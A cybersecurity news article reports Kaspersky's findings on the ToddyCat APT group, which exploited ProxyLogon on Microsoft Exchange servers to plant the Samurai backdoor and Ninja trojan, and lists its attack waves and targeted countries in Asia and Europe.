Microsoft Exchange Servers Attacked by ToddyCat APT Group to Inject Backdoor

Over a year ago, ToddyCat, an APT group targeting Microsoft Exchange servers, launched an attack on Microsoft Exchange servers across Asia and Europe.

Security researchers at Kaspersky’s GReAT were tracking the group’s activity, and at that time they discovered two malware. Among them, one is a previously unknown backdoor, and the other one is a new trojan. And below is the list of what they have discovered:-

  • Samurai (Previous one)
  • Ninja (New one)

The attackers are able to take control of both malware strains and move laterally through the networks of the victims using both malware strains.

ESET, a Slovak cybersecurity firm, has also detected ToddyCat’s attempts to penetrate computers in the past. Throughout March of 2021, ESET began tracking these threats as part of a group referred to as Websiic.

During the time of the attack, hackers exploited the vulnerabilities in ProxyLogon Exchange. As a result of this exploit, they were able to deploy the China Chopper shell code onto vulnerable servers and gain RCE.

Attack waves & targets

In addition to high-profile organizations, such as governments and military entities, or contractors who work with these entities, the group’s target varies from time to time.

A small number of government organizations from the following countries were targeted initially, and this known as the first wave of attacks that took place between December 2020 and February 2021:- 

  • Vietnam
  • Taiwan

In addition to a long list of countries globally, the next wave which took place between February 2021 and May 2021, quickly grew to include entities from a wide range of countries, including the:- 

  • Russia
  • India
  • Iran
  • The United Kingdom

The next phase of ToddyCat’s expansion will focus on the same cluster of countries. Additionally, from the following countries it added more organizations as well:-

  • Indonesia
  • Uzbekistan
  • Kyrgyzstan

Activity links with Chinese-speaking APTs

Several Chinese-speaking groups have also targeted the same industries and countries as ToddyCat does.

The Chinese-backed hackers exploited the FunnyDream backdoor to hack into some of the entities they breached around the same time. This group is concentrating its efforts on very high-profile targets, as indicated by the affected organizations, both governmental and military.

ToddyCat APT uses a wide range of techniques to maintain its stealth and avoid detection for an extended period of time. Targets in Southeast Asia are a primary concern for the group. However, their activities also affect targets in Europe and Asia region as well.

You can follow us on LinkedinTwitterFacebook for daily Cyber security and hacking news updates.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.